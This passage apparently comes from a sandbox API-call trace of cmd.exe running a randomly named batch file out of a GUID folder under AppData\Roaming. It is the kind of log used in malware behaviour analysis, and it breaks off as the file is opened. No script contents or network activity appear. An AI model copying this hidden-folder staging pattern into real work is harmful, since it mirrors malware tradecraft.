1 [0032.259] GetEnvironmentStringsW () returned 0x3f4280* [0032.259] GetProcessHeap () returned 0x3e0000 [0032.259] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xae2) returned 0x3f6be0 [0032.259] FreeEnvironmentStringsW (penv=0x3f4280) returned 1 [0032.259] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0032.259] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0032.259] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0032.259] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0032.259] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0032.259] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0032.260] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0032.260] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0032.260] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0032.260] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0032.260] GetProcessHeap () returned 0x3e0000 [0032.260] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x54) returned 0x3f76d0 [0032.260] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3bf758 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0032.260] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3bf758, lpFilePart=0x3bf754 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf754*="Desktop") returned 0x25 [0032.260] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0032.260] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3bf4d4 | out: lpFindFileData=0x3bf4d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3f3ee8 [0032.260] FindClose (in: hFindFile=0x3f3ee8 | out: hFindFile=0x3f3ee8) returned 1 [0032.260] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3bf4d4 | out: lpFindFileData=0x3bf4d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3f3ee8 [0032.260] FindClose (in: hFindFile=0x3f3ee8 | out: hFindFile=0x3f3ee8) returned 1 [0032.260] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0032.260] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3bf4d4 | out: lpFindFileData=0x3bf4d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd783d060, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd783d060, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3f3ee8 [0032.260] FindClose (in: hFindFile=0x3f3ee8 | out: hFindFile=0x3f3ee8) returned 1 [0032.261] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0032.261] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0032.261] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0032.261] GetProcessHeap () returned 0x3e0000 [0032.261] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6be0 | out: hHeap=0x3e0000) returned 1 [0032.261] GetEnvironmentStringsW () returned 0x3f60f0* [0032.261] GetProcessHeap () returned 0x3e0000 [0032.261] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb36) returned 0x3f7730 [0032.261] FreeEnvironmentStringsW (penv=0x3f60f0) returned 1 [0032.261] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a985260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0032.261] GetProcessHeap () returned 0x3e0000 [0032.261] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f76d0 | out: hHeap=0x3e0000) returned 1 [0032.261] GetProcessHeap () returned 0x3e0000 [0032.261] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400e) returned 0x3f8270 [0032.261] GetProcessHeap () returned 0x3e0000 [0032.261] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xd8) returned 0x3f4dc0 [0032.262] GetProcessHeap () returned 0x3e0000 [0032.262] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4008) returned 0x3fc288 [0032.262] GetProcessHeap () returned 0x3e0000 [0032.262] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4008) returned 0x400298 [0032.265] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0032.265] GetProcessHeap () returned 0x3e0000 [0032.265] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f4ea0 [0032.265] SetErrorMode (uMode=0x0) returned 0x0 [0032.265] SetErrorMode (uMode=0x1) returned 0x0 [0032.265] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\.", nBufferLength=0x208, lpBuffer=0x3f4ea8, lpFilePart=0x3bf6d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}", lpFilePart=0x3bf6d0*="{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}") returned 0x54 [0032.265] SetErrorMode (uMode=0x0) returned 0x1 [0032.265] GetProcessHeap () returned 0x3e0000 [0032.265] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f4ea0, Size=0xd0) returned 0x3f4ea0 [0032.265] GetProcessHeap () returned 0x3e0000 [0032.265] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4ea0) returned 0xd0 [0032.265] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\.") returned 1 [0032.265] GetProcessHeap () returned 0x3e0000 [0032.265] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb8) returned 0x3f4f78 [0032.265] GetProcessHeap () returned 0x3e0000 [0032.265] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x164) returned 0x3f5038 [0032.265] GetProcessHeap () returned 0x3e0000 [0032.265] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f5038, Size=0xb8) returned 0x3f5038 [0032.265] GetProcessHeap () returned 0x3e0000 [0032.265] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5038) returned 0xb8 [0032.266] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0032.266] GetProcessHeap () returned 0x3e0000 [0032.266] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f50f8 [0032.269] GetProcessHeap () returned 0x3e0000 [0032.269] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f50f8, Size=0x76) returned 0x3f50f8 [0032.269] GetProcessHeap () returned 0x3e0000 [0032.269] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f50f8) returned 0x76 [0032.269] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0032.269] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat", fInfoLevelId=0x1, lpFindFileData=0x3bf46c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bf46c) returned 0x3f3ee8 [0032.269] GetProcessHeap () returned 0x3e0000 [0032.269] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x14) returned 0x3f5178 [0032.269] FindClose (in: hFindFile=0x3f3ee8 | out: hFindFile=0x3f3ee8) returned 1 [0032.269] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0032.269] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0032.269] GetProcessHeap () returned 0x3e0000 [0032.269] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fc288 | out: hHeap=0x3e0000) returned 1 [0032.269] GetProcessHeap () returned 0x3e0000 [0032.269] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x400298 | out: hHeap=0x3e0000) returned 1 [0032.269] GetProcessHeap () returned 0x3e0000 [0032.269] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8270 | out: hHeap=0x3e0000) returned 1 [0032.269] GetConsoleOutputCP () returned 0x1b5 [0032.270] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0032.270] GetUserDefaultLCID () returned 0x409 [0032.270] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a984950, cchData=8 | out: lpLCData=":") returned 2 [0032.270] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3bf898, cchData=128 | out: lpLCData="0") returned 2 [0032.270] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3bf898, cchData=128 | out: lpLCData="0") returned 2 [0032.270] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3bf898, cchData=128 | out: lpLCData="1") returned 2 [0032.270] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a984940, cchData=8 | out: lpLCData="/") returned 2 [0032.270] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a984d80, cchData=32 | out: lpLCData="Mon") returned 4 [0032.271] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a984d40, cchData=32 | out: lpLCData="Tue") returned 4 [0032.271] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a984d00, cchData=32 | out: lpLCData="Wed") returned 4 [0032.271] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a984cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0032.271] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a984c80, cchData=32 | out: lpLCData="Fri") returned 4 [0032.271] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a984c40, cchData=32 | out: lpLCData="Sat") returned 4 [0032.271] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a984c00, cchData=32 | out: lpLCData="Sun") returned 4 [0032.271] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a984930, cchData=8 | out: lpLCData=".") returned 2 [0032.271] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a984920, cchData=8 | out: lpLCData=",") returned 2 [0032.271] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0032.272] GetProcessHeap () returned 0x3e0000 [0032.272] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x20c) returned 0x3f5198 [0032.272] GetConsoleTitleW (in: lpConsoleTitle=0x3f5198, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0032.272] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0032.272] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0032.272] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0032.273] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0032.273] GetProcessHeap () returned 0x3e0000 [0032.273] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3f8270 [0032.273] GetProcessHeap () returned 0x3e0000 [0032.273] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8270 | out: hHeap=0x3e0000) returned 1 [0032.276] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat\"", _String2=")") returned -7 [0032.276] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat\"") returned 68 [0032.276] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat\"") returned 68 [0032.276] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat\"") returned 71 [0032.276] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat\"") returned 71 [0032.276] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat\"") returned 80 [0032.277] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat\"") returned 80 [0032.277] GetProcessHeap () returned 0x3e0000 [0032.277] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f53b0 [0032.277] GetProcessHeap () returned 0x3e0000 [0032.277] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xd4) returned 0x3f5410 [0032.277] GetConsoleTitleW (in: lpConsoleTitle=0x3bf590, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0032.278] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat\"")) returned 0xffffffff [0032.278] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0032.278] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0032.278] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0032.278] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0032.278] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0032.278] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0032.278] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0032.278] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0032.278] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0032.278] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0032.278] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0032.278] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0032.278] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0032.278] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0032.278] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0032.278] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0032.278] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0032.278] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0032.278] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0032.278] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0032.278] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0032.278] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0032.278] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0032.278] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0032.278] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0032.278] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0032.278] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0032.278] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0032.278] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0032.278] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0032.279] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0032.279] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0032.279] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0032.279] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0032.279] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0032.279] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0032.279] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0032.279] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0032.279] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0032.279] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0032.279] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0032.279] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0032.279] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0032.279] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0032.279] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0032.279] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0032.279] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0032.279] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0032.279] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0032.279] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0032.279] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0032.279] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0032.279] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0032.279] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0032.279] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0032.279] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0032.279] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0032.279] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0032.279] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0032.279] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0032.280] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0032.280] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0032.280] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0032.280] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0032.280] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0032.280] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0032.280] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0032.280] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0032.280] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0032.280] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0032.280] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0032.280] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0032.280] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0032.280] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0032.280] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0032.280] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0032.280] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0032.280] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0032.280] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0032.280] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0032.280] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0032.280] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0032.280] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0032.280] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0032.280] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0032.280] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0032.280] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0032.280] GetProcessHeap () returned 0x3e0000 [0032.280] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3e07f0 [0032.280] GetProcessHeap () returned 0x3e0000 [0032.280] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xd4) returned 0x3f54f0 [0032.280] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0032.281] GetProcessHeap () returned 0x3e0000 [0032.281] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3e0a08 [0032.281] SetErrorMode (uMode=0x0) returned 0x0 [0032.281] SetErrorMode (uMode=0x1) returned 0x0 [0032.281] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\.", nBufferLength=0x208, lpBuffer=0x3e0a10, lpFilePart=0x3bf0b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}", lpFilePart=0x3bf0b0*="{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}") returned 0x54 [0032.281] SetErrorMode (uMode=0x0) returned 0x1 [0032.281] GetProcessHeap () returned 0x3e0000 [0032.281] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3e0a08, Size=0xd0) returned 0x3e0a08 [0032.281] GetProcessHeap () returned 0x3e0000 [0032.281] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3e0a08) returned 0xd0 [0032.281] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\.") returned 1 [0032.281] GetProcessHeap () returned 0x3e0000 [0032.281] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb8) returned 0x3e0ae0 [0032.281] GetProcessHeap () returned 0x3e0000 [0032.281] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x164) returned 0x3e0ba0 [0032.281] GetProcessHeap () returned 0x3e0000 [0032.281] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3e0ba0, Size=0xb8) returned 0x3e0ba0 [0032.281] GetProcessHeap () returned 0x3e0000 [0032.281] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3e0ba0) returned 0xb8 [0032.281] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0032.281] GetProcessHeap () returned 0x3e0000 [0032.281] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3e0c60 [0032.283] GetProcessHeap () returned 0x3e0000 [0032.283] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3e0c60, Size=0x76) returned 0x3e0c60 [0032.283] GetProcessHeap () returned 0x3e0000 [0032.284] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3e0c60) returned 0x76 [0032.284] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0032.284] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat", fInfoLevelId=0x1, lpFindFileData=0x3bee4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bee4c) returned 0x3f55d0 [0032.284] GetProcessHeap () returned 0x3e0000 [0032.284] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f5178, Size=0x4) returned 0x3f5178 [0032.284] FindClose (in: hFindFile=0x3f55d0 | out: hFindFile=0x3f55d0) returned 1 [0032.284] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0032.284] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0032.284] GetConsoleTitleW (in: lpConsoleTitle=0x3bf324, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0032.285] GetProcessHeap () returned 0x3e0000 [0032.285] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x11c) returned 0x3e0ce0 [0032.285] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x74d40000 [0032.285] GetProcAddress (hModule=0x74d40000, lpProcName="SaferIdentifyLevel") returned 0x74d62102 [0032.286] IdentifyCodeAuthzLevelW () returned 0x1 [0032.294] GetProcAddress (hModule=0x74d40000, lpProcName="SaferComputeTokenFromLevel") returned 0x74d63352 [0032.294] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0032.294] GetProcAddress (hModule=0x74d40000, lpProcName="SaferCloseLevel") returned 0x74d63825 [0032.294] CloseCodeAuthzLevel () returned 0x1 [0032.294] SetErrorMode (uMode=0x0) returned 0x0 [0032.294] SetErrorMode (uMode=0x1) returned 0x0 [0032.294] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat", nBufferLength=0x104, lpBuffer=0x3e07f8, lpFilePart=0x3bf210 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat", lpFilePart=0x3bf210*="c48c75d7__.bat") returned 0x63 [0032.294] SetErrorMode (uMode=0x0) returned 0x1 [0032.294] GetProcessHeap () returned 0x3e0000 [0032.294] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xd4) returned 0x3e11b0 [0032.294] CmdBatNotification () returned 0x3e08bc [0032.294] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, 